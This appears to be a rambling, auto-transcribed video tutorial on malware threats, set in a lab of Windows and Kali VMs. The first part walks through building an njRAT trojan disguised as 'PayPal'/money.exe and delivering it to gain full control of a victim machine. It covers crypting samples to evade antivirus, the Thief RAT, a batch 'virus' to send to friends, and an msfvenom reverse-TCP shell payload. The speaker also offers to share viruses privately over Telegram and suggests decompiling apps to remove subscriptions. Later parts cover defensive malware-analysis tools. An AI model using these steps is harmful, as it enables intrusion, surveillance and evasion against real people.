So now we are discussing about malware threats. So what is a malware? So malware is like malicious software. Refers any software intentionally designed to cause damage to a computer or a server or a client or a computer network. Various type of malware threats like viruses, worms, Trojan horses, ransomware, spyware, adware, rootkits, botnets, keyloggers, and much more things. So, to protect against these threats, it's essential to keep a software is up to date. Use reputable antivirus program to avoid clickjacking on unknown links or downloading like a suspicious files and regularly backup important data. That's the main thing. So our first task is gain control over a victim machine using any type of rat or Trojan. So yes, right here, gain control over a victim machine using the ngrat. So I would like to use a ngrat or else Trojan horse. So attacker can use a remote access Trojan to infect the target machine to gain administrative access of the rat and help an attacker to remotely access the computer graphical user interface and control the victim's computer without his or her awareness. They can perform screening and camera capturing, code execution, key logging, file access, password sniffing, registry management, and other tasks. So the various viruses infect a victim via phishing attacks and drive-by downloaded and propagates through infected like USB keys or network drives. It can download it and execute additional malware and executes a shell command, read and write registry keys and capture a screenshot and log keystrokes and spy on web cameras. So now we would like to look here. So here I have one machine is Windows 2019 is for an attacker machine. So this machine is an attacker machine and Windows 2016. This machine is for victim machine. So I just use as this one as victim machine. So now we would like to look here. So first we would like to uh, go for our first task. So go to here, malware threats. So first I would like to use the ngrat. Now I would like to launch this ngrat. Then click on run. So as a default port 5552, it will start like that. You just click on start. So then you would like to click on first as an CMD. So you need to know your targeted IP address of your system. So you just look here, IP config. So this is your IP config 192.168.18.53. Then once you come back here, so I am testing only in my local machines. So if you want as an specified IP address, you just need to use it a static IP address, not a DHCP IP address. So first you just click on builder. So you just need to enter your targeted IP address. Then it's same thing. So you just look here. I would like to change as a name uh, like I would like to write like as an PayPal, and you just give it as now as like choice is your wish. Exe name like money.exe. Then I just go for build. So that it came under my desktop and it is in exe folder. So that server folder is successfully built. So this I was successfully executed on last time. So come back here and this also. So you just come back. So now you just need to open as sharing. Okay. Let's open your Firefox. So here is an Tofi share. You can look here as an Tofi share. As a weak internet as a weak. So that's why now it's we are getting. So we have built our RAT remote access Trojan. Now we would like to send this one to as a victim. This my file, server file. You just copy this one. So you can make it as a crypt. That one it's well and good. Then once copy this, come back here. So here you just need to open as Firefox here. So you just paste it this, then you can download this as an your payload. So it was downloaded. So now you just come back here. So open this. So I just go to a downloads. So you just install this. Double tap on this. That's it. So you can get the machine here. You just close this. So when you come back here. So in the case of IP address, you just need to use as here as your static IP address. So now you can see here PayPal, you get as an connection. Come back here. So you can see here it was connected the system. So once you right click on this, so you can see here run a file. You can get a remote desktop. You can get as remote camera. Then you can get like a get passwords, keylogger, open a chat. So I would like to open a chat. You just type here as PCPLX, then click on OK. Then it was connected. You just type here you are hacked. Then you just type send. Now you can look here as in pop-up is came. PCPL Alex, you are hacked. So you can control the victim machine like however you like. So now I just don't want this one to send messages. Now I would like to look here like uh, microphone. Also you can get it like get passwords, keylogger, open chat, server, update, upgrade, restart, close, disconnect. You can rename, open a folder. So you can open a folder. This file is an empty here. Okay. So the network is gone. This machine. I think this machine is here. So this is the way you can get the remote access control of any one of the rat. So rats are commonly you can use like choices your wish. Like you can use like big fat rat, otherwise uh, any type of rats you can use. Like in the markets, they're gonna release every day one rat, so you can use that rats also. It's well and good. So you can control entire of the victim machine. What else you like? You can do a remote desktop. You can do what else you like. So you would like to look one more time. I think it was infected that machine. So I would like to close this. Then I would like to open again. So that's it. Yeah. So now we would like to go for like open this again for on virtual machine. So we would like to look now as so now we would like to look like hide a Trojan using like a SWASI cryptor and make it as undetectable to various antivirus programs. So we can see like various anti programs like in the everywhere like virus total or some other things. So now we just open this. So I would like to write here. So we just type hide a Trojan using SWASI cryptor and make it undetectable to various antivirus program. So now we would like to go, click on cancel. So at the present, numerous of antivirus software programs have been configured and detect the malware such as like Trojans, viruses, worms. Although security specialists keep updating the virus definitions, hackers continuously try to evade or bypass them. One method that attacker can use and bypass the antivirus to encrypt and abbreviations to encrypt. So the malicious files fully undetectable and cryptos words crypting these files allows them to achieve their objectives and thereby taken complete control of the victim machines. So, Cryptos is a software that encrypts the original binary code like exe file, otherwise ELF file, or any type of files, or spyware, keyloggers, among others. So SWASI encryptor is an encryptor that allows user to encrypt their program and source code. So first we would like to look here, virus total. So here is on our first choice, we would like to go to our virus total. Scroll up. So I would like to choose an file. So this is my file which I was created through an NJRAT. So I would like to scan this file. It's confirm and upload. Now you can analyze this file. You can look here. It was detecting as how many viruses you can see here. Now you can get it here. Entire of 74, it passes 63. So we need to make it as an victim, as an trustable for this file for installing. So you like here Bitdefender, Backup Pro, CrowdStrike Falcon. So it's also DRWeb. It's like Trojan generic payload. Windows 33 familiar bin payload. You can see here how many payloads it's raised. So we just need to make it as an undetectable. That's it. So for making this one as an undetectable, now we would like to go for SWASI cryptor. So back here. So I would like to download as SWASI cryptor download. So it's not this one. SWASI cryptor. So we cannot able to file cryptor. So we would like to look here. Any one file we can get it here. So we can download here. So we would like to look this. X cryptor. So we would like to come back here. Go to your downloads. Now you just extract it here. So it was in the C program. So it was written here. You can look here. Xcryptor is a generic cryptation library with as S-box keys and algorithm mostly inspired by AES algorithm. So they are using as an AES algorithm. So there was written the programming written in Katana Steel Fortinet. So it's not given here as an encryptor, so we cannot able to execute it here. This. So you can use a SWASI cryptor. So this will give as less as to go. So better I would like to look here. So we would like to look here the malware threats. No have here. So we know have. So that will be reduce the file system. So that will reduce the risk of the system of the file. So here we will get like 63. Now that will be get like 23 like that. That's it using that one. So we would like to create a Trojan using like a thief rat. So thief is a remote access Trojan written in Delphi It allows a remote attacker access the system via port like 9871. Thief is an Windows-based application, both client and server. Thief server is an virus that you install on the target computer, and thief client is what you and when used a control virus. Generally, an attacker might send a server executable to the victim machine and entice the victim into running it. In this lab demonstration, we are using directly like sharing entire of the file. So now we would like to look here. So first we would like to come back here. So open this as malware threats. So we would like to use as a thief rat. So I would like to write here. Number 3 is create a Trojan server using thief rat Trojan. So now we would like to have here as an server file as the same thing. So I already downloaded in my same machine as same the programming. Okay. So you just enter the password. So now we would like to close all this. So now you just open the your file explorer. So if you know how this works, so you just need to know only of your targeted IP address, your victim IP address. That's it. So if your victim, if you share this your victim, and if your victim is directly run this server file, that's it. So you get entire of his control access here. So here we would like to run this server 210.exe. So once you just double tap this one, you just type here as an CMD. You just type here as an ifconfig. So this is your IP address. So just type here ipconfig. So this is your targeted IP address. So you have double tap this one. Okay, no worries. So now come back here. So here we would like to enter the client 210. That's it. Just run this. So you just need to enter the your victim IP address. That's it. Now here the port is there. Then you just need to try to connect. Just click on connect. So the connection with 192.168.60. Double click to clear. So it's not at accepted yet. So either I would like to go and run as administrator. That's it. Now we would like to go and try to connect. Attempting with 192.168.18 is failed. So we not yet get. So either I would like to come back here. So we would like to look here Windows Defender. So I would like to disable all the Windows firewall. Uh, so I just type custom, then I just go for settings. Then you just off it. So again, you just run 2 times. So why it never connect even locally also? So we would like to run this. Now try to connect. So now attempting to connect with the targeted IP address. Then let's see. So connection is failed because this Windows machine does not have Apache server. So that was it was failed to connect it. So if it not was enabled the Apache server, so it never going to be connected. So even you can try with another thing. Cannot able to go with. So just try. So once you have connected all these things, you can look here as like so. You can look here like PC details, OS information, home, network. Then this like a screen capture, task manager, processor view, service, keylogger, webcam, passwords, remote prompt, IF chats by microphone. Every information you can get it from here. So it was failed. So it does not connect. So master should be run like Apache server or something else. So we would like to go. So you can explore all those things in this. Thief version 2.10. Date is 1st November 2004. Author beta tester Jojo Lichi Lawrence. That's it. So we would like to go for another tutorial. So it was failed the tutorial. So now we would like to try using like so you just type here create a virus using your own and make a tools and infect to the target system. like this. Yeah. Create a virus using your own and infect the target system. So while creating any type of viruses, it does not take much time. So you just type open new tab. So you just type here like echo of, and you just type here right echo. So you can write some payloads and share it, and you just type like second. So you can write here like color 0A, then you just type here as start, and you just type here as echo as welcome to PCPL Alex, and just type here subscribe. So then you just type here again echo, and you just type here please uh, watch until the end. So I don't like to write all this because of YouTube community guidelines. So please choose virus. You just type here echo, press 1 for coronavirus. Then you just type again echo, press 2 for plague virus. So now you just write here like if percent virus percent equals to 1, go to 1. So in the one place you can write any one of the targeted website. It's up to you. And you just type here echo. So here I just mistaken. Yes. So again you just type here virus 2, go to 2. That's it. So now I would like to go for ending now. So now I just type here echo, and you just type here as virus has successfully built, executed. executed. That's it. So you need to save this file as in not txt. Like you can look here which type of things here you would like to look here. So you just need to write here. So I would like to use as normal as txt. I just write here as virus.bat. So you can spread to your friend. You can save and spread to your friend. So once he double tap on that one, so the virus will be executed. So I'm just writing as a normal way. That's it. So I'm not going to give as full as you required. Okay. So as of community guidelines, I'm not showing you. So if you want in private, so I can write any type of virus and I can share you in the Telegram group. So I'm just splitting now. Yes. Just type. So now we would like to go for another one is 5. Perform a malware scanning using hybrid analysis. Perform malware scanning using hybrid analysis. So, hybrid analysis is a free service that analyzes suspicious files and URLs and facilitates the quick detection of unknown threats such as viruses, worms, trojans, and other kind of malwares. It helps ethical hackers and penetration testers to examine the file of URL, establishing an identification of viruses, worms, trojans, and other malicious contents detected by antivirus and agents. So, if you would like to go now, open the Firefox. We would like to look the hybrid analysis. So, first we would like to open the hybrid analysis. So, scroll up. So, you just drag and drop the hybrid analysis. So, once you get it here, you have already as a server. So, this will go for any other thing. So, it shows. So, just type here, I agree. Then click on you're not robot. So, you just need to verify these small things. Then click on continue. So, it will go for uh, malware for Windows 11. Then you just go for as quick scan. So I would like to go for as quick scan. Then so it was starting now. You would like to look here. So it's like malicious antivirus detection is 96 percentage. This is the sharp. Last antivirus scan is like 4 15 20. So it will take some little bit time. So click more information about the product. So we would like to look this one. So we not yet get any useful information about this malware. So I noted as selected for this as Windows. So that's why it's not given as an right result. So we would like to try one more time. So come back here. So we would like to delete entire of this. Then enter. So even you can search here, Yara search. So you just type server. Once this is done, so you just type I agree. Then we would like to confirm this. So we would like to go another thing. So we would like to complete this first. Then click on continue. Then you just select Windows for 36. Then generate a public. So generate a public report. Now we would like to see here. So it is in the progress. Time is 322 seconds. Then let's wait for 322 seconds. Then we would like to get the report. Then we would like to go further. So while generating this report, we would like to go for another report, another tool called is perform a string search using bin text. So let's type here. Perform a strings search using bin text. So, software programs including some strings that are command to perform a specific function such as printing a output, strings communicate information from the program to user. Various strings that could represent the malicious intent of the program, such as reading internal memory or cookies data, are embedded into the compiled binary code. Searching through an strings can provide information about the basic functionalities of any program. During a malware analysis, search for malware strings that could determine the harmful actions that a program can perform. For instance of program access, a URL it will be have the URL string stored to you. You should alternatively, while looking for strings such like embedded, and should alternatively look the string search for embedded and encrypted strings for an complete analysis of the suspect file. So we would like to look here. So we have got it here as in results. You can see here 100% is malicious. So you can look. Now we have got it this. So let it come. So before that, we would like to install the bin extractor. Then click on run. So, let's see. So, we are installing this one, bin to text. So, just install, then click on finish, then it will start now the program. So, once before it start, we would like to look this a server.exe. So, this report is generated from the file or URL submitted by web service on July 17, 2024. So, guest system is Windows 11 64-bit operating system. So, you can see here sample is unavailable, downloads is external, reanalyze, request a report, deletion. So, we would like to go for also you can look MITRE attack and techniques detection also. So we would like to look here is like malicious indicator is for external system install a persistent pattern matching, spyware information retrieval, and suspicious indicator is level. So you can look here and informative. So informative does not worth to get a bounty of any type of organization. So you go and tell to one of the companies like Starbucks, I have found your XSS payload bug here. It's if it already patched, so they don't want to pay you anything else. So it's just like information. So you need to find a critical vulnerabilities here. So you can see here 24 kilobyte. This is in encryption preview. Input file is on port EX and it was language in neutral and icon. You can see here you can change the icon choices your wish. 54.9 59.4% is an EXE executable code and .NET and written in mono and you just look here TST and RS. So which was done hybrid. So in the server.exe, once you extracted that one, you can find here foundy.exe, foundu.do.exe, optional features.exe, network analyze DNS request, contacted hostess, HTTP traffic. You never get all those things. That's it. So you can analyze the file in this way. So now we would like to come back to our bin.exe. Now we would like to analyze one file. Like we would like to look here as a server file. I just type here, you just look here, manifest. So now this will be loaded. Let's wait. So you can look here the so I would like to click on this. So I just type here as view. So once you look here as a server, dimensions and color, then so it's like just an icon viewer. That's it. Now we would like to analyze this one. Like I would like to analyze. resource extract. That's it. So we are not extracting here much information. So this need to complete. So once this is done, you can look all the which type of strings it was written like binary with 0 or 1. Then you can get all the information here. So I would like to look later this one. So now I would like to go for another tutorial. So now we would like to open this 7. So identify packing and obfuscation method using PID. So just type here. Identify packing and obfuscation methods using PID. So attackers often use packing and obfuscation or packer to compress or encrypt or modify a malware executable file to avoid detection. Obfuscation is also hide the execution of the program. When the user executes the packed program, it can also run a small wrapper program to decompose the packed file and then runs an unpacked file. It, com- it complicates the task of reverse engineering to determine the actual program and logic other metadata via static analysis. The best approach tries to identify the file including a packed elements and locate the tools or method used to pack it. So here PEID is an open source tool to perform this. So here is PEID. So we would like to run this PEID. PID is an open source free tool that provides a detail about Windows executable file. It can identify a signature associated with over 600 different packers and compilers. This tool also displays the type of packer used in the packing program. So now we would like to get our source of file. Click on these three dots. So we would like to click on this desktop. So here have server.executable files. So here we got it here as our information. So here it shows encrypt, entry point and file out offset and EP session, then first byte subsystem. So if you want to do like a task viewer, you can view the task. So it was written in C programming all. So we just close this. Then we just look like multi-scan. We would like to scan a directory of our desktop. Then click on OK. Scan a directory. So it was written in like a C hash and basic.NET. That's it. So this is how you can do the packing and obfuscation method using PID. Now we would like to go for on the tool. So we would like to close this. So it's never done. So now we would like to go for another tutorial is 8. So analyze a ELF file, executable file using it, detect it easy. So now we would like to look here. Analyze ELF executable file. using detect it easy. So the executable and linkable format is a generic executable file format in Linux environment. So for Linux environment, so I just need to open my Kali Linux and I just need to create as in some ELF virus. So I just don't need again this 16. So it contains three main components, including like ELF header, sections, and segment. Each component plays an independent role in the loading and execution of ELF executables. So the static analysis of an ELF, the file involves investigating an ELF executable file without running or installing. So it also involves for accessing the binary codes and extracting the values and artifacts from the program. Numerous tools can be used to perform a static analysis on ELF files. In this task, we are using to use like detect it easy tool to analyze ELF file. So detect it easy is an application used for determining the types of files apart from the Windows. So DIE is also available in Linux, macOS. It has completely open architecture of signatures and it can easily add its own algorithms for detecting or modifying an existing signature. It detects and files compilers, linkers, packers, and etc. So using a signature based detection method, so we would like to download the detection it easy. So first we would like to enter come to our Kali Linux. So we have set up here. So I have here detect it easy. We open this. So I just need to install it this one first. So when you go for malware threats, it's like bit and complex things. So first, you just need to get the URL. Go to our Kali Linux machine, open the terminal. So you just need to generate as a payload here. So for payload, you just type here. First, you just need to type as your IP config is 26. So you just type msfvina minus p defines for payload and you just type Linux and x86 and you just go for shell and reverse TCP. Then you just type lhost equal to enter the targeted IP address 192.168.18.26. Then L port is 7890. Then file type is an ELF. Then you just need to give as here as linux.elf. That's it. So now the payload will be generated here. Let's see. So here the payload is generated. So now I want to look this one sudo su and paste. So you just type here move linux.elf to where www html and share. So this I was discussed in system hacking. So you just type enter. So now go back to here, open this as new tab here. So you just enter the targeted IP address and you just type here share unable to connect. Okay, no worries. So you just type here service Apache to start. Now just come back here. Now so it's a same. So you would like to look here service Apache to status. So it was running. So now we would like to go back here. So we no need to go for HTTPS. We just need to enter yes. Now just type here as share. So here have linux.elf. So we have downloaded our Linux ELF payload. So we just click on these three dots. So go to downloads, scroll down. Here is linux.elf. So you just click on open. So you can look here operating system is Unix 0 386 32-bit. So we have seen here as something 208. So I would like to look here. So you just click on info, then click on recursive scan, deep scan, heuristic scan, then click on scan. So I just type scan now. 1 milliseconds. That's it. Then we go for directories. So now it's taking all the information. So I'm just scanning all the directories. Look here, which was available like here, all the information of Linux. So it was generated for 32-bit version. So when you go for binary, so we would like to look here. Let's wait. Nothing. When you go for signatures, so you can see here all the signatures binary. So it was written something here as, where is this? GitHub. For detected easy signature. You would like to look here. So you can look all the information here. Choice is your wish. It's in binary, FAC. So every information is available here. So result in general. Just run here left it. So you can also debug this one. So now we would like to look here also. That's it. So similarly, you can explore further way of much things. So we would like to look this here. One more is Linux. So it's also a same thing. So we go for scan. Here is nothing. This also is same thing. That's it. So now we would like to go for another tutorial. So you just type here, find a portable execution. Information of malware executable file using P Explorer. So just type here, find the portable executable as we just define as P information of a malware execution file using P Explorer. So the portable executable format is an executable file format used on Windows OSs that stores the information a Windows system requires to manage the executable code. The PA stores a metadata about the program, which helps in finding additional details of file. For instances, the Windows binary is an P format that consists of information such as time of creation, modification, import and export functions, compilation time, and DLL, and linked files as well as strings, menus, and symbols. So, P Explorer let you open like view and edit variety of different 32-bit OS and executable files, also called like PE files, ranging from common such like exe, DLL, and ActiveX controls of less similar types of such as screensavers, control panel applets, system, MSS files, BPL, DPL, and more, including like executable files to run on Windows operating system or mobile platforms. So now we would like to run this P Explorer. So I just install this, then click on next, click on agree. So it was installed now. So now let's see. So a pop-up will come. So you just type features list. So you just close it. So you just need to load any one of the virus file. So you just click on file, open a file here. So when you go here, come back to your downloads. So you can open any one of these things. Like you just open as a broot, which we was done. You have 30 days left to evaluate trial conditions. So you just click on continue. So you can look here about this P Explorer. So you can view and modify these things all here. So in the section alignment, so you can see here data value, file alignment. So you can look here tools, remove a debug info, remove a relocations, plugin manager. So you can look here data directories. So there is no any type of data directories. Then we would like to look header info. That's it. We got it here. Section headers, txt and our data, then data. So the program which was inputted here, you can see here all the data here. So you can see here as dot gif IDs, rsrc, relog. So the virtual address, virtual size, characteristics, every information we got here. So once you would like to double tap on this, so this is in raw data, this is raw data. So you can modify the raw data, and RV data we cannot able to modify, and this is like what else you have coded that was written in like some other programming. So we cannot able to execute it this one. So you just type, if you want to go this one, you just type F4. So you can look multiple things here. That's it. But you cannot able to modify this one as txt. Come back here. So this is how you can analyze a malicious file using like a P Explorer. That's it. Now we would like to go for another tutorial. Yes. So now we would like to go for another tutorial. Identify file dependencies using dependency walker. So any software or program depends on various inbuilt libraries of OS that helps performing a specified actions in a system or a program. It needs to work with an internal system file to a function correctly. Program stores their import and export functions in kernel 32 DLL files. File dependencies contains information about the internal systems file that the program needs to function properly. This includes the process of registration and location of the machine. So, find the libraries of the file dependencies as they contain information about runtime requirement of the application. Then, check to find and analyze these files to provide information about the malware in the file. File dependencies includes a linked libraries, functions, and function calls. Check dynamically linked list in the malware executable file. Finding out all library functions may allow a guessing about the malware program can do. You should know various DLL used to load and run the program. The dependency walker tool lists all the dependent modules of executable files and build the hierarchical tree or diagram. It also records all functional that each module export the calls. Further, it detects many common applications programs such as missing and invalid modules, import and export mismatches, circular dependencies errors, mismatched missions, modules and modules initialization failures. So we would like to go here. So we would like to install this dependencies worker. So I would like to open any one of the executable file. So as an exe file, I just click on open. Now I just go to this PC, downloads. So better I would like to look as this. So all files. Okay. So I would like to use as a seatbelt, so which I was used in the last time in the system hacking. So now let it this load. So we got it some errors. So you can click on OK. So now you can see here the seatbelt.exe. There is an MS Microsoft correlated data. It is in DLL and kernel is a 64-bit and API MSS and NTLD. Then once you execute all those things, so you can look here when you make it big, you can look here error. At least one required implicit forwarded dependencies was not found. Modules with the different CPU types were not found. At least one delay loaded dependencies modules not found. So unresolved due to a missing of export functions or delay. So you can look here everything. So you would like to come back here, close this. So once you click on this, so we would like to click on kernel 32DLL. So you can observe the kernel. So not for acquire for everything. So you can export all those things as reports. So this is how you can identify using like dependencies. Dependency walker. Now close this. So now we would like to go for another tutorial is 11. Perform malware disassembly using IDA and OLEDB. So you just type here perform malware disassembly using IDA and OLEDB. So static analysis is also included in dismantling of given executable into a binary formats. To study these functionalities and features, this process helps to identify the language used in programming the malware. Look for API that reveals its function, that retrieve other information based on the reconstructed assembly code. You can inspect the program logic and recognize its threat and potential. This process uses debugging tools such as IDA Pro and OLEDB. So IDA is a dissembler. IDA is explored for binary programs for which the source code might not be available to create maps of their execution. So the primary purpose of dissembler is to display the instructions actually executed by the processor is symbolically represents called like assembly language. However, in real life time, things are not always simple. First step, code usually does not cooperate with the analyst. Viruses, worms, and trojans are often are and obfuscated. As such, more powerful tools are required. The debugger in IDA complements the static analysis compatibility of disassemble by allowing an analyst to single step through the code being investigated. So the debugger often bypass the obfuscation. It helps obtain a data that the move of powerful static disassembler with an open process index. So what is OLEDBG? OLEDBG is a debugger that emphasizes binary code analysis, which useful when source code is unavailable. It traces registry and recognition procedure. API call switches enables a constraint that strings and located routine of object files and libraries. So we would like to install now IDA. Come back here. So this is our IDA. So we just double tap on this. So we would like to install, click on yes. We just click on I accept agreement. Then next. So it was finished now. So now you just double tap on this. Then you just click on I agree. Then okay. So now we have got it here. So now what you would like to do here is, so click on disassembly a new file. So you just need to select your targeted file is I would like to use as broot for disassembling. Now it was portable executable P64 DLL. Then I just click on OK. Could not find signature file. That's OK. Could not find. Do not display this message again and again. OK. So loading a B root. So this was loaded here. So you can look here everything about the programming. Everything is pop up. So you can analyze here every information. You can look here. So you can look entire of the source code here, which he was written here. So here is an wrong main endpoint. SP analysis is failed and string and local. So it was in a graph. Okay. So I can't able to put this one as fit into the window. So it's like not good. So this is in hexadecimal. You can look here hexadecimal. So if you are expert in hexadecimal, like taking the file and reading in hexadecimal, then you can read that one. So this is in local types. It was written in a C program. So you can analyze like a star flow. Then you can look here every information. Endpoints, padding. Padding can be used only for color. And that's it. We would like to look. So imports. So it was imported kernel version 32-bit kernel version here. You can analyze here. What is this? So this and all in a version. What else here? Question mark. We cannot find. So when you pop up somewhere else, you are getting a long thing. So execution record, security attributes, every information you are getting. So when you go for imports, is valid code page is getting here. So when you need to learn first this binary language like 0 and 1, then you can understand this hexadecimal process. So imports, and when you go for exports, so if you want to export entire of these things, you can export. When you come back here, you can look this graph. So if you want to look this graph in one page, you can look here. So I don't want here as looking as graph. So in the down, you can look here all the information. So here is all the information. So this is how you can analyze all the information using IDA. So you can analyze using like we would like to run this. Please read carefully and risk of unauthorized code execution. You are about to launch the following application using. So okay, we just run. So uh, it was running this B root. Windows privilege escalation, bang bang. So that was done. So we have executed even in the Windows. So the core system we have seen here. So we have successfully got it here. So you can try in another way. Okay. We would like to go. So we'll close this. Packet database, save a data. Don't pack the database. Do not save the database. That's it. Okay. Okay. That's it. So even you can try with the uh, only DGB. So this also is the same thing, but it was something as a different graphical user interfaces. That's it. So we would like to quit this. Now we would like to go for G-Hydra. So we would like to come back here to what? So we just type here perform malware disassembly using G-Hydra. So G-Hydra is a software for reverse engineering framework that includes a suite of full-featured, high-end software analysis tool that enables users to analyze compiled code on variety of platforms, including a Windows, macOS, Linux. It compatibles, including a disassembly, assembly, decompilation, debugging, emulation, graphing, and scripting. G-Hydra scripts a wide variety of processors, instruction sets, and executable formats, and that can be run both on user interfaces and automated modes. Analyzers can also develop their own G-Hydra plugin components and scripts using exposed APIs. In addition, there are numerous ways to extend G-Hydra, such as new processor loaders and exporters, and automated analyzers and new visualization. So now we would like to run this G-Hydra. Come back here, go to a malware threats. Here is G-Hydra. So I already installed this G-Hydra, so you just double tap on this. Now this G-Hydra will come for running. Where is this? So I would like to, yes, now it's coming. So it was, so you just accept. So another one, you can close it. So you can see here, this was used for national security agencies only. So they're gonna analyze for malware threats and some other things. So like to look here, let us start. So here, tip of the day. So when you got tip of the day, so you just click on close this. So here now have an active projects. So for that we would like to get an project. So you just type file, new project. I just click on non-shared project. Then you just click on next. So you just specify the project administrator. So I would like to save in the desktop. File name as Hydra. So I just give PCPL Alex. So I just give here, select a project directory. Then project name is uh, pentesting. Then so once again, so now have active project. So you just click on new project. So we just create project name as pentesting. Then click on finish. So here we got it here as pentesting. Now we would like to click on file, import a file. So now we got it and a file to import. So we got it, go to our downloads folder. Now I would like to import the B root, this one. So hashing, now it's importing the B root file. Okay. So once this is pop-up is came, then you just click on OK, loading this one. So let it load first. So once it was done, so you just click on OK. So now we would like to double click on this. We are launching this tool to analyze. So now B root has been analyzed. Would you like to analyze it now? So you just type yes. So now you can analyze analysis option. So you just click on select all. Then you just click on analyze. So you can look here the symbol of tree like they was go for coding. So I would like to come back here as big here. Now you can look here in the code. So it's an entry, so you can look here multiple things. So once you look here is an B root. So we have already got this like txt. So void entry void function and function unwritten. So decompile of the entry. So we would like to look the R data. So this is an offset. So get the latest. So we would like to look the data 042D2. So you would like to analyze by this. Debug the data. So this is in data. So better the first preference is like you need to learn the binary language. So you can see here text $mn. So kernel 32 DLL. You can look here WS2 Windows 2.32 DLL. So even you can look here namespaces. So it is in progress. Let it come. So it will decompile all everything of the programming. So you can look everything. So here, so you can do like if you get the program of any one of the program. So if like a Netflix company, they have developed for Windows exe platform. So you can debug for removing the subscription also from here, and you can utilize yourself. That's it. So we would like to go for namespaces. So in the spaces, you can look here switches. So what else you can select that will be decompiled here, everything here. I just close this. So I would like to, the tool is busy for performing a task. You would like to continue task may be terminated, some may work may be lost. So I would like to type no. So it will go for analyzing like this. So now I would like to type. So I would like to close it anyway. So I just type don't save, then click on OK. So when you come back here, oh, it's closed order. So you can use as an your wish, like as when you go for help, you can find multiple things here in the Hydra. So now we would like to go for another task is so I would like to come back here setting. So just type here perform a port monitoring using a TCP view and curry ports. So we know that internet is a software protocol name like a TCP/IP, Transport Control Protocol, and IP to format the transfer data and malware programs. A curry port, the system and open system, input open ports and establish the connections with a remote system and network servers to accomplish various malicious tasks. These open ports can also act as an background and communication channels and other type like harmful malware and programs. So they open unused ports on the victim's machines to contact the backend of the malware handles. So we would like to open our NJRAT. So we would like to open this our NJRAT. So just start it. So which I already have here as an previous one. So I would like to look as come back here. I would like to get as TCP viewer download. So I would like to download this TCP view. Download a TCP view. So now I come back here. So now I would like to extract all extract. So I would like to run this TCP view. So you just agree. So you can look here in your system NJRAT version version 0.7 exe. So the TCP is running 5520 and you can look here money.exe. The file is running 5696 and SV host that is running. So we would like to look here more SVCHO host. That's it. So you are finding here like close, listen, scan send, scan receive, establish, fin, and TCP delete. So it's okay. So now we would like to look here. Here is server. So we are not getting that server one. So we would like to look here as so it was established with an IP address. This an IP address. This an IP address. So it was listening. So I would like to this kill the process. So terminated the process of exe. Then it is okay. So you have going to terminate it here directly here. That's it. So you are safe from the malwares, otherwise hidden ports. That's it. Now come back here. So now we would like to go for number 14 is perform process monitoring using process monitor. So process monitor will help in understanding the process that malware initiate and takes over after execution. You should also observe the child process associated handles, loaded libraries, functions, and execution flows of boot time and associated boot time process. It defines an entire nature of file or program. Gather information about process running before the execution of the malware and compare them with the process of running after execution. This method will reduce the time of taken, analyze the process, help in identification of all the process and malware starts. So we would like to go now come back here, go to a desktop. We would like to go here. So we would like to install this process monitor, then agree. So you can look here, entire of your process monitor. You can look what else you require. So you would like to look what else you require here. So this will take much time to look here. SRV host. So this will be keep on running only here. The registry files are everything. So anything else, so you just click on properties, click on properties here, then process, you can look here, SRV host, which was running and additionally there, then you would like to look as an stack, kernel base DLL, then the offset address. So even you can see the events and properties and much more things here. So now we go for another tutorial. We just close this, and come back. Just type 15, just type here. So perform registry monitoring. Using registry organizer. So, so the Windows registry stores OS and program configuration details such as settings and options. If malware program, the registry stores the functionalities. When an attacker installs a type of malware on the victim machine, it generates a registry entry. One must have a fair knowledge of the Windows registry. It contains the inner work of analyze the presence of malware scanning for suspicious registry will help you to detect a malware. While most computer users generally do not do this monitoring of registry entries are a great way to track any modifications made to your system. So now we would like to go for registry organizer. So we just install this, then click on next, accept. So now we are launching this one. So here you can look about uh, click on tools, then you just look like private data cleanup. So I would like to look for as a registry snapshots. So now you just need to create a snapshot. So it was creating a snapshot. So let's see. So it will create one of the snapshot for your system. It will take too long time to come for creating this one. So before that, I would like to go here as so I just need to download one more software here. I just type here soft perfect network scanner download. So I just download this one. So it was done. Entry of the snapshot name, then click on OK. Then you just close this. So you just come back here, click on download. So you just download. So open this, come back here, downloads. So you just install this, click on accept, next, next, next. So now once you come back here, so now we would like to look here, startup applications. So you can look here now registry snapshots, compare with the current registry. Now we would like to look here. So this malware threats, it will take too much time consumption when compared to a system hacking. So malware threat is like telling about one of the malwares, which is what is what. So now you can analyze these snapshots and everything here. We would like to analyze this. So let it load this one first. So before that, we would like to go for Another tutorial is 16. So perform a Windows services monitoring using Windows Service Manager. Just type here. Perform Windows services monitoring using Windows Service Manager. So you can observe all those here like hexadecimal current key. You can observe all the classes, local settings, softwares, restart manager, owner, hash, self, Windows Net Authority, current version, device speed, everything. So your Windows has an now secure thing. Yeah, that's it. So you just click on OK. This also, and I'm closing this. Finish. So now we would like to come back here. So this we was done on scanning the networks. So come back here. So attacker design a malware and other malicious code in such a way they install and run on computer devices in the form of services, as most services run in the background and support a process and application for malicious. Services are invisible, even they are performing harmful activities on the system and can even function without interventions or input. Malware spans a Windows services that allows an attacker to control the victim machines and process malicious instructions. Remotely, a malware may also employ a rootkit techniques to manipulate the following registry keys to hide their process and services. So first we would like to go for Service Manager. Service Manager. So we would like to install this. So just accept and then next. So let it wait until install. It was installed already. So it's no how. Was it? So it's not install. So we try to open again desktop. So this service manager will display what are the services is running on the Windows system. That's it. So I just type reinstall. So this not going to work out. We would like to go for 17. So perform a startup program monitoring using auto runs on Windows and WinPatrol. Just type here. Perform startup program, startup program monitoring using auto runs for Windows and WinPatrol. So startup programs are applications or process that starts when your system boots up. Attacker make many malicious programs such as Trojan worms in such a way that they executed during a startup, like which I was told like bypass the UAC in a system hacking. So we failed to execute that one. So and user is unaware the malicious program is running in the background. An ethical hacker or a penetration tester must identify the applications or process that starts when a system boots up and remove any unwanted malicious programs that can breach a privacy or affect a system health. Therefore, scanning for suspicious startup program manually or using startup program. Monitoring a tools like Autoruns on Windows and WinPatrol is essential for detecting a malware. So now we would like to go for, so here is an Autoruns. So I would like to execute the Autorun now. So you can look here in Windows 2019, there is no Office I was installed, but Office is installed here. You can look here, applications, network providers, you can look here, CMD. So there is a Windows command processor. So I would like to delete this one. So there is something else. Delete this entry may require an administration access. So I am running as an administrator now. You can look. So that was deleted. Now I can look here. So Java plug SSV helper. So it's how. So we would like to look for codes, auto runs entry. There is nothing else. So you can look logons. There is an one suspicious file cannot be entered. That's it. Now we would like image hijacks. So iexplorer.exe. So I just want to delete this. So WMI office image path, then services, espnet.state font cache. So cache memory is like storing your internet data and you are running backend of the data. So that will be helpful for the attacker when he access your system. So no DLLs. 